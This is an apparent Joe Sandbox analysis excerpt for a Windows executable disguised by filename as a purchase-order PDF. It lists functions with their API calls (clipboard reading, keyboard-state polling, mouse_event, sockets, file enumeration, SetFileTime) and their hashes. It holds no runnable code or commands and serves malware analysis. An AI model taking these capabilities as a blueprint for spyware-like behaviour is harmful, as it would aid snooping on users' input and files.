                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                                                            • API String ID: 2693929171-438819550
                                                                                                                                                                                                                                                                                                            • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                                                                                                                                                                                                            • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                                                                                                                                                                                                                                                            Function 0046C5D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69clipboardCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046C692
                                                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0046C866
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                                                                                                                                                                                                                                            • String ID: HH
                                                                                                                                                                                                                                                                                                            • API String ID: 589737431-2761332787
                                                                                                                                                                                                                                                                                                            • Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                                                                                                                                                                                                                                            • Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
                                                                                                                                                                                                                                                                                                            Function 00436431 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 0043643C
                                                                                                                                                                                                                                                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                                                                                                                                                                                                                                                            • __wcsicoll.LIBCMT ref: 00436466
                                                                                                                                                                                                                                                                                                            • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: __wcsicollmouse_event
                                                                                                                                                                                                                                                                                                            • String ID: DOWN
                                                                                                                                                                                                                                                                                                            • API String ID: 1033544147-711622031
                                                                                                                                                                                                                                                                                                            • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                                                                                                                                                                                                                            • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                                                                                                                                                                                                                                                                            Function 004741BB Relevance: 7.6, APIs: 5, Instructions: 137networkCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00474213
                                                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 4170576061-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                                                                                                                                                                                                                                            • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                                                                                                                                                                                                                                                                            Function 00456354 Relevance: 7.6, APIs: 5, Instructions: 127keyboardCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(004A83D8), ref: 0045636A
                                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(004A83D8,?), ref: 0045638A
                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(?), ref: 004563D0
                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(?), ref: 004563DC
                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00456430
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3539004672-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                                                                                                                                                                                                            • Instruction ID: 0eacbf52c9ff4b21db6d2500407d28a57be55752a0539e191fb639d8ee6a043b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b6f1a7d11e91e3692d621cb91ecba55955a7a9a0de246f0cd2a62484a80ce0b
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E416071108341ABD724DF55CD84EBBB7E9EF86725F540B0EB8A543281C734A848CB6A
                                                                                                                                                                                                                                                                                                            Function 004772DE Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32 ref: 00477314
                                                                                                                                                                                                                                                                                                            • IsWindowEnabled.USER32 ref: 00477324
                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32(?,?,?,00000001,?,?), ref: 00477331
                                                                                                                                                                                                                                                                                                            • IsIconic.USER32 ref: 0047733F
                                                                                                                                                                                                                                                                                                            • IsZoomed.USER32 ref: 0047734D
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                                                                                                                                                                                                            • Instruction ID: c753cb395bd8887e5e04db90522a3107d7308fd2cfa588f53a4db7a4177bc043
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c24098bd8cb9da3f496229370c910df04dc27541171caa4f2956f9c30b83eee
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 351172327041119BE3209B26DD05B9FB7A8AF91310F05882EFC49E7250D7B8EC42D7A9
                                                                                                                                                                                                                                                                                                            Function 00436D2D Relevance: 7.6, APIs: 5, Instructions: 52filetimeCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000,75923220,00000000,00000000,00442E95,?,?,?), ref: 00436D4F
                                                                                                                                                                                                                                                                                                            • SetFileTime.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00436D8C
                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 00436D93
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3397143404-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                                                                                                                                                                                                            • Instruction ID: bce1a9391340f9688fe0750810cd2cb1b104417d8b3c1e96578cdf6de8724fbd
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17e11168520f802dddbe8c477e19047108492bf153e6cd976562f268bfda3e60
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A4F0C83634132077E5301A69AC8DFCF276CABDAB32F20452EF741A61C083D51445977D
                                                                                                                                                                                                                                                                                                            Function 0044EBBC Relevance: 7.6, APIs: 1, Strings: 3, Instructions: 551COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _strncmp
                                                                                                                                                                                                                                                                                                            • String ID: ACCEPT$^$h
                                                                                                                                                                                                                                                                                                            • API String ID: 909875538-4263704089
                                                                                                                                                                                                                                                                                                            • Opcode ID: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                                                                                                                                                                                                                                            • Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
                                                                                                                                                                                                                                                                                                            Function 00446566 Relevance: 5.9, Strings: 4, Instructions: 868COMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                            • String ID: ERCP$VUUU$VUUU$VUUU
                                                                                                                                                                                                                                                                                                            • API String ID: 0-2165971703
                                                                                                                                                                                                                                                                                                            • Opcode ID: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                                                                                                                                                                                                                                            • Instruction ID: 514654dd073cfe12bfc68f6c44a091d7a3824994b709b832431b3f3de6bbd106
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5562D3716087818BE734CF18C8807ABB7E1EBC6314F154A2FE49986390E779D949CB5B
                                                                                                                                                                                                                                                                                                            Function 0045C999 Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 3541575487-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
                                                                                                                                                                                                                                                                                                            • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                                                                                                                                                                                                                                                                                            Function 00436ADE Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
